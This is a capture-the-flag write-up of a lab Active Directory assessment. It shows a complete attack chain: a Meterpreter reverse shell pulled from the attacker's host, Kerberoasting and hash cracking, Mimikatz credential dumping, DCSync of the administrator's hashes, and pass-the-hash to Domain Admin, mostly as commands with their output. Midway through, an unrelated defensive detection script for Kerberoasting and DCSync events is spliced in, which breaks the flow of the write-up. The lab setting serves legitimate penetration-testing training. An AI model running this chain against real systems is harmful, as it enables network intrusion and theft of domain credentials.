HTB Acad AD Attack Module Final Assessment
Part I
Getting a shell
We are given a web server running ASP.NET (aspx). It has a file upload vulnerability, and under /uploads there is a page from which we can run PowerShell commands.
My first goal was to get a shell back to my Linux attack machine, so I used msfvenom to craft a reverse shell payload and served it with a simple HTTP server:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.15.238 LPORT=9999 -f exe > shell.exe
python3 -m http.server 8080
On the web server I fetched the shell:
Invoke-WebRequest -Uri "http://10.10.15.238:8080/shell.exe" -OutFile "C:\shell.exe"
Before we run the shell on the server we need to start a Metasploit handler to catch the Meterpreter session:
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.15.238
LHOST => 10.10.15.238
msf6 exploit(multi/handler) > set LPORT 9999
LPORT => 9999
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > exploit
After that we run C:\shell.exe on the server and catch the shell.
Kerberoasting SPN
Before doing anything else, run powershell.exe to make sure we are in a PowerShell session rather than cmd.
First we enumerate all SPNs and look for the account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433:
setspn.exe -Q */*
The username for this account is svc_sql.
We use the following commands to request the TGS for our target account:
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/SQL01.inlanefreight.local:1433"
This loads the TGS for the target into memory. Normally we would extract it with Mimikatz, but it is not installed on the web server, so I first download it to my attack machine and then fetch it from there onto the web server:
Invoke-WebRequest -Uri "http://10.10.15.238:8080/mimikatz.exe" -OutFile "C:\mimikatz.exe"
We run mimikatz.exe and extract the TGS from memory with two commands: one to switch the output to a base64 blob and one to export the tickets:
base64 /out:true
kerberos::list /export
We copy the base64 blob into a file, call it sql_b64, and decode it back into a .kirbi file:
cat sql_b64 | base64 -d > sql.kirbi
Then we run kirbi2john and fix up the output format so hashcat can crack it:
kirbi2john sql.kirbi > hash_file
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' hash_file > sql_hashcat
Finally, we crack it using hashcat:
hashcat -m 13100 sql_hashcat /usr/share/wordlists/rockyou.txt
Accessing MS01
Now that we have a valid password for the svc_sql account, we can set up a PSSession to connect to MS01.
First we create the credential:
$username = "inlanefreight\svc_sql"
$password = "lucky7"
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ($username, $securePassword)
Then we run:
Enter-PSSession -ComputerName "MS01.inlanefreight.local" -Credential $cred
After that we can look at our privileges:
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
We can confirm that RDP (port 3389) is listening. To reach it over RDP we also need the IP address of MS01:
Get-NetTCPConnection | Where-Object { $_.State -eq 'Listen' }
LocalAddress LocalPort RemoteAddress RemotePort State AppliedSetting
------------ --------- ------------- ---------- ----- --------------
:: 49672 :: 0 Listen
:: 49671 :: 0 Listen
:: 49670 :: 0 Listen
:: 49669 :: 0 Listen
:: 49668 :: 0 Listen
:: 49667 :: 0 Listen
:: 49666 :: 0 Listen
:: 49665 :: 0 Listen
:: 49664 :: 0 Listen
:: 47001 :: 0 Listen
:: 5985 :: 0 Listen
:: 3389 :: 0 Listen
:: 445 :: 0 Listen
:: 135 :: 0 Listen
0.0.0.0 49672 0.0.0.0 0 Listen
0.0.0.0 49671 0.0.0.0 0 Listen
0.0.0.0 49670 0.0.0.0 0 Listen
0.0.0.0 49669 0.0.0.0 0 Listen
0.0.0.0 49668 0.0.0.0 0 Listen
0.0.0.0 49667 0.0.0.0 0 Listen
0.0.0.0 49666 0.0.0.0 0 Listen
0.0.0.0 49665 0.0.0.0 0 Listen
0.0.0.0 49664 0.0.0.0 0 Listen
0.0.0.0 3389 0.0.0.0 0 Listen
172.16.6.50 139 0.0.0.0 0 Listen
0.0.0.0 135 0.0.0.0 0 Listen
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::d144:ccca:996b:abd5%4
IPv4 Address. . . . . . . . . . . : 172.16.6.50
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 172.16.6.1
Next, we create a port forward through the Meterpreter session so we can RDP to MS01 from our host:
portfwd add -l 7878 -p 3389 -r 172.16.6.50
xfreerdp /v:localhost:7878 /u:"inlanefreight\svc_sql" /p:"lucky7"
Lateral Movement
Now we want credentials for other users. Getting Mimikatz onto MS01, which we can now reach over RDP, will be useful, but MS01 cannot reach our host directly, so we use xfreerdp to share the folder containing Mimikatz with MS01:
xfreerdp /v:localhost:7878 /u:"inlanefreight\svc_sql" /p:"lucky7" /drive:Assess,/home/muhannad/Desktop/assess
Then we can simply copy mimikatz.exe (available from GitHub) over the shared drive and run:
privilege::debug
sekurlsa::logonpasswords
This gives us the cleartext password for the user tpetty. Now, what can tpetty do? To enumerate further we transfer PowerView to MS01 the same way we did Mimikatz, and check the ACLs this user holds:
$sid = Convert-NameToSid tpetty
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}
This user holds extended rights including DS-Replication-Get-Changes-All, which means tpetty can perform a DCSync attack.
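As a defender's counterpart to the Kerberoasting step above and the DCSync rights just found (an added example, not part of the original write-up), the script below scans flattened Security event records for 4769 tickets issued with RC4 (the etype 23 that hashcat mode 13100 cracks) and for 4662 events where a non-DC account exercises the DS-Replication-Get-Changes rights. The key=value record format, the sample values and the account names other than svc_sql and tpetty are constructed assumptions.

```python
import re

# Control access right GUIDs for DS-Replication-Get-Changes, -Get-Changes-All and
# -Get-Changes-In-Filtered-Set, as they appear in the Properties field of event 4662.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",
    "89e95b76-444d-4c62-991a-0facbeda640c",
}
# Ticket encryption types 0x17/0x18 are RC4-HMAC, i.e. the etype 23 hashes cracked above.
RC4_ETYPES = {"0x17", "0x18"}


def parse_event(line):
    """Parse one flattened 'Key=Value;Key=Value' record (a constructed format) into a dict."""
    return dict(kv.split("=", 1) for kv in line.strip().split(";") if "=" in kv)


def alerts(events):
    """Return one alert string per suspicious record; an empty list means nothing was flagged."""
    found = []
    for line in events:
        ev = parse_event(line)
        eid, acct = ev.get("EventID"), ev.get("Account", "")
        # Kerberoasting indicator: an RC4 TGS for a real service account. Computer accounts
        # (trailing $) and krbtgt are skipped because they are the usual benign RC4 noise.
        if eid == "4769" and ev.get("TicketEncryptionType", "").lower() in RC4_ETYPES:
            svc = ev.get("ServiceName", "")
            if not svc.endswith("$") and svc.lower() != "krbtgt":
                found.append(f"RC4 TGS for {svc} requested by {acct} from {ev.get('ClientAddress')}")
        # DCSync indicator: replication rights exercised by anything that is not a DC computer account.
        if eid == "4662" and not acct.endswith("$"):
            guids = set(re.findall(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}",
                                   ev.get("Properties", "").lower()))
            if guids & REPLICATION_GUIDS:
                found.append(f"directory replication access by {acct} on {ev.get('ObjectName')}")
    return found


# Constructed sample records, not telemetry captured from the lab.
SAMPLE_EVENTS = [
    "EventID=4769;Account=jdoe@INLANEFREIGHT.LOCAL;ServiceName=MS01$;TicketEncryptionType=0x12;ClientAddress=::ffff:172.16.6.50",
    "EventID=4769;Account=jdoe@INLANEFREIGHT.LOCAL;ServiceName=svc_sql;TicketEncryptionType=0x17;ClientAddress=::ffff:172.16.6.100",
    "EventID=4662;Account=DC01$;ObjectName=DC=INLANEFREIGHT,DC=LOCAL;Properties={1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662;Account=tpetty;ObjectName=DC=INLANEFREIGHT,DC=LOCAL;Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
]

if __name__ == "__main__":
    for a in alerts(SAMPLE_EVENTS):
        print("ALERT:", a)
```

Only the RC4 request for svc_sql and the replication access by tpetty are flagged; the AES ticket for MS01$ and the replication by DC01$ are treated as normal.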
Running this command opens another shell in the context of the tpetty user:
runas /netonly /user:INLANEFREIGHT\tpetty powershell
For some reason Mimikatz fails:
mimikatz # lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator
[DC] 'INLANEFREIGHT.LOCAL' will be the domain
[DC] 'DC01.INLANEFREIGHT.LOCAL' will be the DC server
[DC] 'INLANEFREIGHT\administrator' will be the user account
ERROR kull_m_rpc_drsr_getDCBind ; RPC Exception 0x00000005 (5)
So instead we right-click PowerShell, select 'Run as different user' and enter tpetty's credentials, since this user has the rights needed for DCSync:
mimikatz # lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator
[DC] 'INLANEFREIGHT.LOCAL' will be the domain
[DC] 'DC01.INLANEFREIGHT.LOCAL' will be the DC server
[DC] 'INLANEFREIGHT\administrator' will be the user account
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration :
Password last change : 4/11/2022 9:24:49 PM
Object Security ID : S-1-5-21-2270287766-1317258649-2146029398-500
Object Relative ID : 500
Credentials:
Hash NTLM: 27dedb1dab4d8545c6e1c66fba077da0
ntlm- 0: 27dedb1dab4d8545c6e1c66fba077da0
ntlm- 1: bdaffbfe64f1fc646a3353be1c2c3c99
lm - 0: 757743529af55e110994f3c7e3710fc9
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : b8bcb44123b3cc3bff20c663f1e0b94d
* Primary:Kerberos-Newer-Keys *
Default Salt : INLANEFREIGHT.LOCALAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : a76102a5617bffb1ea84ba0052767992823fd414697e81151f7de21bb41b1857
aes128_hmac (4096) : 69e27df2550c5c270eca1d8ce5c46230
des_cbc_md5 (4096) : c2d9c892f2e6f2dc
OldCredentials
aes256_hmac (4096) : 51d2b5ce03d6ea2e75e69050f32b927d0e602c2806dcb0d1dd0aacdda619a510
aes128_hmac (4096) : b93da9262f5ce0ed724ce0177366bc8a
des_cbc_md5 (4096) : 0876d604a7087cf7
OlderCredentials
aes256_hmac (4096) : 23cbc0dad348bebcbdbb4c82e9b23af299e8b56de358bafe24f2235f34497e4a
aes128_hmac (4096) : e35eb565af30c8ed79df5d8875508df6
des_cbc_md5 (4096) : 4904021983252cd5
* Primary:Kerberos *
Default Salt : INLANEFREIGHT.LOCALAdministrator
Credentials
des_cbc_md5 : c2d9c892f2e6f2dc
OldCredentials
des_cbc_md5 : 0876d604a7087cf7
* Packages *
NTLM-Strong-NTOWF
* Primary:WDigest *
01 c05d2bd2d448c260d63c391862358e9a
02 2ba60ae4300b00bd1a20b601f24e386a
03 cd2b7cce6ac8a39ac0a5a048feaa059a
04 c05d2bd2d448c260d63c391862358e9a
05 1084cdc6cf3b03a0425a0b4b6f8df2ab
06 4cbd7e1c07a9cd8f5d74821b8f7d73b5
07 a60dd8c295cfea5356e2e071336e4b73
08 9549ac69526305a3b52fc7eb81c36d5b
09 41883c94f1394d3f6420113ee9bde48b
10 cf77d4474145a014474eac18cb559026
11 9549ac69526305a3b52fc7eb81c36d5b
12 81319b4284c63dd5ecab7c53c41f2f4b
13 f586b7f78f320c2b7f7153e3adfa3d60
14 7ddf4411eb64636a952e01a3a6065213
15 581bab6ff054b23e65f14adc15126f9e
16 8638e61dd907d6ca411e1be885cf6ae2
17 fec8a8deb4f9320986e0deaae31c7974
18 f7dc49e2e0539d0e221b46139677c903
19 f405be39c0733cb794a2aca4b072f2a7
20 cf83e03b8abad7ae24a3b010cf3c7577
21 982dab323d8efa80ad1550985eb49e71
22 731741e7f2f621aaa2f446eb77997beb
23 b5928a821c656d267659d5eb5e4ab02d
24 020ab18e15e8a5fbd66748455afae6e5
25 4ac30d853103b2f8362243b72955d89f
26 9a0a62820b990a595affa9ac2119f299
27 5fda8e968eabd2561522cb2c2a918f56
28 224906fbb8c4570c87416aaee7b6419c
29 5632d3eb6e5fc24a09f67092988a92ef
Pass-The-Hash
Finally we perform the pass-the-hash attack. On the compromised machine, run Mimikatz as administrator and then run the following command with the NTLM hash:
sekurlsa::pth /user:Administrator /domain:inlanefreight.local /ntlm:27dedb1dab4d8545c6e1c66fba077da0 /run:cmd.exe
This opens a cmd running with Domain Admin privileges. From here we can read flag.txt on the Administrator's desktop.
First we map the C$ share of DC01 to drive Z:
net use Z: \\DC01\c$
type Z:\Users\Administrator\Desktop\flag.txt